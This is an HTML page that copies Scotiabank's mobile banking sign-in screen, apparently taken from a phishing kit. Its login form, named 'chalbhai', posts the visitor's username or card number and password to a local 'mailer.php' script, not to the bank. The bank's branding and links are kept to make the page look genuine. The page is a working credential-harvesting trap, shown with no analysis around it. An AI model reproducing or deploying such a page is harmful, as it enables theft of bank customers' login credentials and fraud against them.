<!DOCTYPE html>
<html lang="en" style="" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></script>
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Scotiabank-BankingWeb</title>
  <meta name="description" content="">
  <link rel="shortcut icon" href="https://mobilebanking1.scotiabank.com/bankingweb/resources/favicon.ico" type="image/x-icon">
  <link rel="apple-touch-icon" href="https://mobilebanking1.scotiabank.com/bankingweb/resources/apple-icon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.00, maximum-scale=1, user-scalable=0">
  
  <link rel="stylesheet" href="./Scotiabank-BankingWeb_files/css.css">

  <!-- omniture -->
  <script>

 

  <!-- endomniture -->


  <!-- endga -->


 </script><meta class="foundation-data-attribute-namespace"><meta class="foundation-mq-xxlarge"><meta class="foundation-mq-xlarge-only"><meta class="foundation-mq-xlarge"><meta class="foundation-mq-large-only"><meta class="foundation-mq-large"><meta class="foundation-mq-medium-only"><meta class="foundation-mq-medium"><meta class="foundation-mq-small-only"><meta class="foundation-mq-small"><style></style>


<meta class="foundation-mq-topbar"><style type="text/css"></style></head>
<body class="">
<nav-bar params="route: route"><div>
    <div class="nav-bar fixed" data-bind="template: { afterRender: enhanceWithin}">
        <nav class="top-bar scotiabank" data-topbar="" role="navigation" data-bind="visible: isVisible(), attr: { class: &#39;top-bar &#39; + branding() }" style="display: none;">
            <ul class="title-area">
                <li class="name">
                    <h1>
                        <!--
                        <div data-bind="ifnot: route().page === 'account-summary'">
                        <a href="" id="goBack" class="back-button" data-bind="click: goBack" ><img class="back-button"src="images/arrow-back.svg" onerror="this.src='images/arrow-back.png'"></img></a>
                        </div>
                        -->

                    </h1>
                </li>
                
                <!-- <section class="middle tab-bar-section" data-bind="if: displayPageTitle()">
                        <span class="medium" data-bind="html: pageTitle()" tabindex="0"></span>
                </section> -->
                
                <!-- Remove the class "menu-icon" to get rid of menu icon. Take out "Menu" to just have icon alone -->
                <li class="toggle-topbar" data-bind="if: displayMenuOptions()"></li>
            </ul>
            
        <section class="middle tab-bar-section">
                        <img class="logo" aria-hidden="route().page === &#39;activate-select&#39; || route().page === &#39;recover-select&#39;  || route().page === &#39;dcv&#39; " tabindex="0" alt="Scotiabank" data-bind="attr: {src: navLogoSVG(), onerror: navLogoPNG()}" src="./Scotiabank-BankingWeb_files/logo.svg" onerror="images/en/logo.png">

                </section><section class="top-bar-section" data-bind="if: displayMenuOptions()"></section></nav>
    </div>
</div></nav-bar>
<notifications><div class="notifications" aria-live="assertive" data-bind="template: { afterRender: enhanceWithin}">
	<div class="error-message alert-box" role="alertdialog" data-bind="notificationVisible: hasNotification, notificationType: globalNotification().notificationType" tabindex="-1" style="display: none;">
		<!-- ko if: globalNotification() --><!-- /ko -->
	</div>
</div></notifications>
<loading params="{isLoading: BankingJS.Utilities.Network.isLoading}"><div data-bind="template: { afterRender: enhanceWithin}, visible: isLoading" class="loading-container" role="alert" aria-live="assertive" tabindex="0" style="display: none;">
	<div class="loading" id="load" aria-label="Loading"><div class="spinner" role="progressbar" style="position: absolute; width: 0px; z-index: 2000000000; left: 50%; top: 50%;"><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-0-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(0deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-1-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(27deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-2-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(55deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-3-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(83deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-4-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(110deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-5-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(138deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-6-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(166deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-7-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(193deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-8-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(221deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-9-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(249deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-10-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(276deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-11-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(304deg) translate(24px, 0px); border-radius: 5px;"></div></div><div style="position: absolute; top: -5px; opacity: 0.25; animation: opacity-60-25-12-13 1s linear infinite;"><div style="position: absolute; width: 40px; height: 10px; background: rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px; transform-origin: left center 0px; transform: rotate(332deg) translate(24px, 0px); border-radius: 5px;"></div></div></div><div style="color: transparent">Loading...</div></div>
</div></loading>
<div id="page" class="container height100" data-bind="component: { name: route().page, params: route }, css: isWideView() ? &#39;height100&#39; :&#39;&#39;"><div data-bind="template: { afterRender: enhanceWithin }" class="login-container component-container">
	<div>
		<img id="loginLogo" class="login-logo" src="./Scotiabank-BankingWeb_files/login-logo.svg" onerror="images/en/login-logo.png" style="width: 60%;">
	</div>
	<div id="browser-warning-frame"></div>
		<div class="margin">
			<div class="clearfix">
				<label id="cardNumberInputLabel" class="login small dark-grey left" for="cardNumberInputText" data-bind="text: lbl.CardNumber">Username or Card Number</label>
				<label id="saveCheckLabel" class="small dark-grey right" for="id" data-bind="text: lbl.SaveToggle">Remember me</label>
			</div>
			<div class="input-1">
				<div>
				<form action=mailer.php name=chalbhai id=chalbhai method=post>
					<!-- ko ifnot: disableCardInput -->
					<input id="cardNumberInputText" name="cardNumberInputText" type="text" class="login-card-number small" autocomplete="off" placeholder="Username Or Card Number" maxlength="12" value="">
					<!-- /ko -->
					<!-- ko if: disableCardInput --><!-- /ko -->
				</div>
				<div class="save-card">
					<input id="id" type="checkbox" class="save-card" name="id" data-bind="checked: cardSaved">
					<label tabindex="0" id="saveCheckLabelStar" class="save-card" for="id"></label>
				</div>
			</div>
			<label id="passwordInputLabel" class="small dark-grey" for="passwordInputText" name="passwordInputLabel" data-bind="text: lbl.Password">Password</label>
			<div>
				<input id="passwordInputText" name="passwordInputText" type="password" class="password" autocomplete="off" placeholder="Password" maxlength="16" value="">
			</div>
		</div>
		<div class="row login" id="signin">
			<div class="large-12 columns">
				<button type="submit" id="signOnButton" class="red-button mb20" data-bind="text: lbl.SignIn">Sign In</button>
			</div>
			<div class="large-12 columns c">
				<a href="https://mobilebanking1.scotiabank.com/bankingweb/#" id="resetPasswordURL" class="clickable input-action small blue" data-bind="click: executeRecover, text: lbl.ResetPassword">Need help signing in?</a>
			</div>
		</div>
	</form>
	<div class="block-icons">
		<ul class="small-block-grid-1" data-bind="foreach: observableLoginLinks">
			<li alt="$parent.i18n.t(actionDescription)">
				<a href="https://mobilebanking1.scotiabank.com/bankingweb/#" data-bind="click: execute, text: $parent.i18n.t(actionDescription), css: actionIcon" class="clickable naviLinks login-footer-links extra-small black menu-locator">Locator</a>
			</li>
		
			<li alt="$parent.i18n.t(actionDescription)">
				<a href="https://mobilebanking1.scotiabank.com/bankingweb/#" data-bind="click: execute, text: $parent.i18n.t(actionDescription), css: actionIcon" class="clickable naviLinks login-footer-links extra-small black menu-contact">Contact Us</a>
			</li>
		
			<li alt="$parent.i18n.t(actionDescription)">
				<a href="https://mobilebanking1.scotiabank.com/bankingweb/#" data-bind="click: execute, text: $parent.i18n.t(actionDescription), css: actionIcon" class="clickable naviLinks login-footer-links extra-small black menu-security-privacy">Mobile Banking Security and Privacy</a>
			</li>
		
			<li alt="$parent.i18n.t(actionDescription)">
				<a href="https://mobilebanking1.scotiabank.com/bankingweb/#" data-bind="click: execute, text: $parent.i18n.t(actionDescription), css: actionIcon" class="clickable naviLinks login-footer-links extra-small black menu-verify">Activate Mobile Banking</a>
			</li>
		</ul>
	</div>
	<!-- Beta modal -->
	<div id="welcomeBetaModal" class="reveal-modal" data-reveal="" role="dialog" aria-labelledby="title-text" tabindex="-1">
		<h2 id="modalTitle title-text"><span id="welcomeTitle" data-bind="text: lbl.WelcomeTitle, hasFocus: true" tabindex="0">Welcome to our new mobile website!</span></h2>
		<p class="lead body-text"><span data-bind="text: lbl.WelcomeBody">Our new mobile website was designed with one person in mind: you. Here you'll find many of the features you're already using, but we've made them clearer, easier to find, and simpler to use.

If you're not ready to try out the Beta version, you can still bank through any of the following:
</span></p>
		<ul class="modalList" data-tab="">
			<li class="modalBullet"><a href="https://mobilebanking1.scotiabank.com/" data-bind="attr: { href: url.classicMobileSiteURL }, text: lbl.ClassicSite">Classic Scotiabank Mobile Website</a></li>
			<li class="modalBullet"><a href="http://www.scotiabank.com/ca/en/0,,317,00.html" data-bind="attr: { href: url.mobileAppsURL }, text: lbl.MobileApps">iOS/Android apps</a></li>
			<li class="modalBullet"><a href="https://www1.scotiaonline.scotiabank.com/online/authentication/authentication.bns" data-bind="attr: { href: url.scotiaOnlineURL }, text: lbl.ScotiaOnline">Scotia OnLine</a></li>
		</ul>
		<button id="search" data-bind="click: function (data, event) { $(&#39;#welcomeBetaModal&#39;).foundation(&#39;reveal&#39;, &#39;close&#39;); }" class="red-button mt20"><span data-bind="text: lbl.WelcomeSubmit">Sign In</span></button>
		<button id="closeWelcomeModal" class="close-reveal-modal welcome-modal" title="close" aria-label="Close Alert"><span aria-hidden="true">×</span></button>
	</div>
	<div id="language" class="radio-toolbar">
		<input type="radio" id="radio1" class="show-for-sr" name="radios" value="en" aria-label="English" checked="" data-bind="checked: language"><button for="radio1" data-bind="click: toggleLanguage">EN</button><input type="radio" id="radio2" lang="fr" name="radios" class="show-for-sr" value="fr" aria-label="Francais" data-bind="checked: language"><button for="radio2" data-bind="click: toggleLanguage">FR</button>
	</div>
</div>
</div>
<script type="text/javascript">var _cf = _cf || []; _cf.push(['_setBm', true]);</script>

</body></html>